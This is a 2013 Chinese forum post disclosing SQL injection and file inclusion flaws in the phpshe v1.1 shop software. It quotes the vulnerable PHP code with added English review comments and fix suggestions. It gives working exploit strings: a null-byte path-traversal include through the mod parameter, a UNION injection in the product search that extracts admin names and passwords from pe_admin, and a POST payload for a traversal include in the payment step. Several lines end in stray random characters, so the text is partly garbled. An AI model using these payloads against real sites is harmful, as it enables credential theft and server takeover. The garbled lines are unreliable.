
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-19 19:01:54
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输


// common.php
// Request-parameter bootstrap (quoted from phpshe v1.1): every key of the GET,
// POST, SESSION and COOKIE arrays becomes a global variable named $_g_*, $_p_*,
// $_s_* and $_c_* respectively. EXTR_PREFIX_ALL only stops a request key from
// overwriting an existing variable; each prefixed variable is still client-chosen
// and, in this codebase, reaches SQL fragments and include() paths unescaped
// (see product.php and order.php below), so the prefix is not a sanitizer.
if (get_magic_quotes_gpc()) {
// Undo magic-quotes escaping; pe_stripslashes()/pe_trim() are project helpers
// whose bodies are not part of this excerpt. get_magic_quotes_gpc() returns
// false on PHP 5.4+, so on such installs only the else branch ever runs.
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
// Only pe_trim() is applied here; nothing in this excerpt escapes for SQL.
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies are client-controlled: every $_c_* variable (e.g. $_c_cart_list used
// by index.php) must be treated as untrusted input.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
0×01 包含漏洞

//首页文件
<?php
// index.php (quoted from phpshe v1.1): front controller that loads the caches,
// computes the cart badge and dispatches to module/<module>/<mod>.php.
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
// Comma-separated QQ list from the settings cache ($cache_setting is set outside
// this excerpt, presumably by common.php).
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// Cart item count: counted from the DB for a logged-in user, otherwise taken
// from the cart_list cookie. NOTE(review): unserialize() is applied to a cookie
// value here ($_c_cart_list comes from $_COOKIE via extract() in common.php);
// unserialize() on client-controlled data is a PHP object-injection risk —
// a JSON-encoded cookie with json_decode() would avoid it.
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// $mod is filled straight from the request by common.php's routing section
// (quoted below) with no character whitelist, which is the limited ("鸡肋")
// file-inclusion the author reports. Restricting $mod to a fixed set of module
// names, or at least to [a-z0-9_], before this line would close it.
include("{$pe['path_root']}module/{$module}/{$mod}.php");  // $mod is client-controllable, giving a limited inclusion vulnerability
pe_result();
?>
//common 文件 第15行开始
url路由配置
// common.php, routing section (quoted from phpshe v1.1): derive module, action
// and id from the request. POST wins over GET, then the 'index' default.
$module = $mod = $act = 'index';
// No character whitelist is applied to $mod or $act; $mod is later interpolated
// into an include() path by index.php. Because these are truthiness tests, a
// value of "0" also silently falls back to the default.
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// $id is not initialised in this excerpt, so when neither POST nor GET carries
// an id the fallback reads an undefined variable (null) — presumably set
// earlier in common.php; verify.
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%007 D/ ^- D% y5 _/ Z1 e4 a% H6 `


0×02 搜索注入

<code id="code2">

// product.php (quoted from phpshe v1.1): product list / search action.
case 'list':
// Category id is cast to int, so this one value is safe to interpolate below.
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
// Search
// $sqlwhere is a raw SQL fragment that is later handed to pe_selectall() as a string.
$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
if ($category_id) {
// Restrict to the category and its children (category_cidarr() is a project
// helper not shown here); every value here derives from the intval'd id.
$sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
// $_g_keyword arrives via extract() in common.php with only pe_trim() applied
// and is interpolated into the LIKE clause unescaped — the injection the author
// reports. Mitigation: escape it (order.php applies pe_dbhold() to its GET id
// for the same purpose — confirm that helper escapes for SQL) or move the
// keyword into a parameterised query.
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; // the keyword variable receives no effective SQL filtering
// The sort column and direction also come straight from GET. Not part of the
// author's report, but the same fix applies: accept $orderby[0] only from a
// fixed list of product columns and $orderby[1] only as asc/desc.
if ($_g_orderby) {
$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
else {
$sqlwhere .= " order by `product_id` desc";
}
// array(16, $_g_page) is the $limit_page argument — presumably page size and
// the GET page number; pe_selectall() is quoted below.
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
// Best-seller ranking
$product_hotlist = product_hotlist();
// Current breadcrumb path
$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
//跟进selectall函数库
// Generic select-all wrapper (quoted from phpshe's db class; the class header is
// not part of this excerpt).
// $table      table name without prefix; interpolated directly into the query.
// $where      an array or a raw SQL string; passed through _dowhere().
// $field      column list, interpolated directly (default '*').
// $limit_page paging spec forwarded unchanged to sql_selectall().
// NOTE(review): _dowhere() is not shown here. The product.php caller above passes
// a string built from unescaped GET input and the author reports it reaching the
// query unfiltered, so string conditions appear to be trusted as-is — confirm
// before relying on this method for any input filtering.
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
// Build the where clause
$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1( O: r: Y5 z5 j! x

</code>
& _2 p# G; }0 _8 ]! p; J
0×03 包含漏洞2

<code id="code3">

//order.php (quoted from phpshe v1.1): payment step for an unpaid order.
case 'pay':
// Order id from GET, passed through pe_dbhold() (project helper, not shown;
// presumably SQL escaping — verify).
$order_id = pe_dbhold($_g_id);
$cache_payway = cache::get('payway');
// Unpack each payment method's serialized config. As far as this excerpt shows
// the data comes from the application's own cache, not from the request.
foreach($cache_payway as $k => $v) {
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
if ($k == 'bank') {
// Flatten line breaks so the bank text can be embedded on a single line.
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
}
}
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
!$order['order_id'] && pe_error('订单号错误...');
if (isset($_p_pesubmit)) {
// NOTE(review): the whole $_p_info POST array is written to the order row, so
// any column of `order` can be set by the client, not just order_payway.
// Restrict the update to the keys this form is expected to submit.
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
foreach ($info_list as $v) {
$order['order_name'] .= "{$v['product_name']};";
}
echo '正在为您连接支付网站,请稍后...';
// The plugin path is built from $_p_info['order_payway'], a POST value that is
// never checked against the configured payment methods — the file inclusion the
// author reports. $cache_payway appears to be keyed by method name (see the
// 'bank' check above), so `isset($cache_payway[$_p_info['order_payway']])`
// before this include would close it.
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
}// once everything above is in place, the limited ("鸡肋") inclusion is reachable
else {
pe_error('支付错误...');
}
}
$seo = pe_seo('选择支付方式');
include(pe_tpl('order_pay.html'));
break;
}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>: x0 U6 H- W" g! T6 w8 {4 _
